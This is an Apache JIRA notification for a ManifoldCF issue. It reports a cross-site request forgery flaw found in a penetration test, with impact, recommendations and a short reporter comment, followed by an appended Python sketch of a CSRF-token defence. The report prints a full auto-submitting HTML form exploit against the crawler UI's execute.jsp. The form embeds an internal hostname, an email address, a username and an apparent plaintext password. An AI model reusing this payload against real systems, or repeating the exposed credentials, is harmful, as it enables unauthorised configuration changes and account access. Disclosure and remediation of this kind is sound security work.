[ https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803825#comment-16803825 ]
roel goovaerts commented on CONNECTORS-1595:
--------------------------------------------

Thank you for your quick reply. The points you raise were also mentioned by us in the conversations around these issues. The UI is indeed only used as a back-office application. It was, however, my responsibility to report these issues to check if there was something that could be done.

Thanks for your time,
Roel

> cross-site request forgery vulnerability
> ----------------------------------------
>
> Key: CONNECTORS-1595
> URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
> Project: ManifoldCF
> Issue Type: Improvement
> Components: API
> Affects Versions: ManifoldCF 2.12
> Reporter: roel goovaerts
> Priority: Minor
>
> Below is the full analysis and description as a result from the penetration test.
>
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing to the attacked application. The image source would actually be a URL with parameters pointing to the application page that performs some action. In case of a form, the form action would point to the action page in the target application, and the form is submitted automatically by JavaScript when the page is viewed.
> 2. The attacker tricks the victim user into browsing to this page. The attacker may get the victim to click a link, or embed the attacking HTML code into some page the victim views, for example in a bulletin board or chat.
> 3. When the victim views the attacker's page, his browser sends a request prepared by the attacker to the attacked application. If the victim is logged in to the target application, his browser will possess all necessary session tokens, so the request will appear as authorized to the application and succeed.
> A cross-site request forgery attack uses the fact that the victim's browser possesses the necessary authentication tokens to perform some actions in the target application.
>
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into clicking a link crafted by the attacker or opening a malicious web page can force the victim to unknowingly perform various actions within the application.
> Given that the whole application is not protected against CSRF, any action that an administrator can take on Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
>
> *Affected Systems*
> * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
>
> *Description*
> It appears that the application does not implement any CSRF protection. Consider the following example. An attacker tricks a logged-in application user into visiting a page containing the following code:
> {code:html}
> <html>
>   <!-- CSRF PoC - generated by Burp Suite Professional -->
>   <body>
>     <script>history.pushState('', '', '/')</script>
>     <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp" method="POST" enctype="multipart/form-data">
>       <input type="hidden" name="op" value="Save" />
>       <input type="hidden" name="type" value="connection" />
>       <input type="hidden" name="tabname" value="Name" />
>       <input type="hidden" name="isnewconnection" value="false" />
>       <input type="hidden" name="connname" value="clix-fr" />
>       <input type="hidden" name="description" value="" />
>       <input type="hidden" name="classname" value="org.apache.manifoldcf.crawler.connectors.webcrawler.WebcrawlerConnector" />
>       <input type="hidden" name="authorityname" value="_none_" />
>       <input type="hidden" name="throttlecount" value="0" />
>       <input type="hidden" name="maxconnections" value="10" />
>       <input type="hidden" name="email" value="ferdi.klomp@craftworkz.nl" />
>       <input type="hidden" name="robotsusage" value="none" />
>       <input type="hidden" name="metarobotstagsusage" value="all" />
>       <input type="hidden" name="regexp_bandwidth_0" value="" />
>       <input type="hidden" name="insensitive_bandwidth_0" value="false" />
>       <input type="hidden" name="connections_bandwidth_0" value="2" />
>       <input type="hidden" name="rate_bandwidth_0" value="64" />
>       <input type="hidden" name="fetches_bandwidth_0" value="12" />
>       <input type="hidden" name="bandwidth_count" value="1" />
>       <input type="hidden" name="acredential_count" value="0" />
>       <input type="hidden" name="scredential_0_regexp" value="https://intrauat.web.bc/" />
>       <input type="hidden" name="scredential_0_0_regexp" value="login" />
>       <input type="hidden" name="scredential_0_0_type" value="form" />
>       <input type="hidden" name="scredential_0_0_matchregexp" value="validation" />
>       <input type="hidden" name="scredential_0_0_overridetargeturl" value="" />
>       <input type="hidden" name="scredential_0_0_0_op" value="Continue" />
>       <input type="hidden" name="scredential_0_0_0_param" value="username" />
>       <input type="hidden" name="scredential_0_0_0_value" value="id996812" />
>       <input type="hidden" name="scredential_0_0_0_password" value="" />
>       <input type="hidden" name="scredential_0_0_1_op" value="Continue" />
>       <input type="hidden" name="scredential_0_0_1_param" value="password" />
>       <input type="hidden" name="scredential_0_0_1_value" value="Th1sIs4cl1X" />
>       <input type="hidden" name="scredential_0_0_1_password" value="" />
>       <input type="hidden" name="scredential_0_0_2_op" value="Continue" />
>       <input type="hidden" name="scredential_0_0_2_param" value="login-form-type" />
>       <input type="hidden" name="scredential_0_0_2_value" value="pwd" />
>       <input type="hidden" name="scredential_0_0_2_password" value="" />
>       <input type="hidden" name="scredential_0_0_loginparamcount" value="3" />
>       <input type="hidden" name="scredential_0_loginpagecount" value="1" />
>       <input type="hidden" name="scredential_count" value="1" />
>       <input type="hidden" name="regexp_trust_0" value="https://intrauat.web.bc" />
>       <input type="hidden" name="trustall_trust_0" value="false" />
>       <input type="hidden" name="trust_count" value="1" />
>       <input type="hidden" name="proxyhost" value="" />
>       <input type="hidden" name="proxyport" value="" />
>       <input type="hidden" name="proxyauthusername" value="" />
>       <input type="hidden" name="proxyauthdomain" value="" />
>       <input type="hidden" name="proxyauthpassword" value="" />
>       <input type="hidden" name="client_timezone_offset" value="-60" />
>       <input type="hidden" name="client_timezone" value="Europe/Zurich" />
>       <input type="submit" value="Submit request" />
>     </form>
>   </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will cause any action of the attacker's choosing to be executed on Manifold.
>
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with an unpredictable value to each form or link that performs some action in the application, commonly referred to as a CSRF token. The parameter value should have enough entropy so that it cannot be predicted by an attacker and should be unique to the current user session. When the user submits the form or clicks the link, the server-side code checks the parameter value. If it is valid, the request is accepted; otherwise it is denied. The attacker has no way of knowing the value of the unpredictable parameter, so he cannot construct a form or link that will submit a valid request.
>
> *References*
> * OWASP - Cross-Site Request Forgery - [https://www.owasp.org/index.php/Cross-Site_Request_Forgery]

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
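The per-session token defence described in the quoted Recommendations section, written out as an added example; this is not ManifoldCF code and nothing in the project implements it this way. A 256-bit random token is bound to the server-side session, rendered into every state-changing form, and compared in constant time on submission. The `Session` dataclass, the `handle_execute` handler and the `csrf_token` parameter name are assumptions for illustration; the `op`, `type` and `connname` parameters mirror the ones in the reported `execute.jsp` request.

```python
import hmac
import secrets
from dataclasses import dataclass, field

TOKEN_BYTES = 32  # 256 bits of entropy, far beyond what an attacker can guess


@dataclass
class Session:
    """Constructed stand-in for a server-side session entry (assumption).

    The token is generated once per session, so it is unique to that user
    and never leaves the server except inside pages served to that user.
    """
    user: str
    csrf_token: str = field(
        default_factory=lambda: secrets.token_urlsafe(TOKEN_BYTES)
    )


def hidden_csrf_field(session: Session) -> str:
    """Render the hidden input the server adds to every state-changing form."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}" />'


def csrf_check(session: Session, form: dict) -> bool:
    """Accept a POST only if it carries the token bound to this session.

    Missing, non-string or mismatched tokens are all rejected. The comparison
    is constant-time so a timing side channel cannot leak the token.
    """
    submitted = form.get("csrf_token")
    if not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(submitted.encode(), session.csrf_token.encode())


def handle_execute(session: Session, form: dict) -> tuple[int, str]:
    """Hypothetical handler for the op/type parameters seen in the report.

    Returns an (HTTP status, message) pair instead of writing a response so
    the outcome can be inspected directly.
    """
    if not csrf_check(session, form):
        return 403, "CSRF token missing or invalid"
    return 200, f"{form.get('op')} {form.get('type')} {form.get('connname')}"


if __name__ == "__main__":
    victim = Session(user="admin")

    # Form rendered by the application for the victim: carries the token.
    legitimate = {"op": "Save", "type": "connection", "connname": "clix-fr",
                  "csrf_token": victim.csrf_token}
    print(handle_execute(victim, legitimate))

    # Cross-site form like the PoC: same fields, but the attacker's page
    # cannot read the victim's token, so the parameter is absent.
    forged = {"op": "Save", "type": "connection", "connname": "clix-fr"}
    print(handle_execute(victim, forged))

    # A token from the attacker's own session is bound to a different
    # session and does not match the victim's.
    attacker = Session(user="attacker")
    print(handle_execute(victim, {**forged, "csrf_token": attacker.csrf_token}))
```

The attacker's page cannot obtain the victim's token because the same-origin policy prevents it from reading pages served by the application, and a token the attacker obtains from their own session fails the check because it is bound to a different session. For this to hold the token must be required on every request that changes state, not only on the forms the pentest exercised.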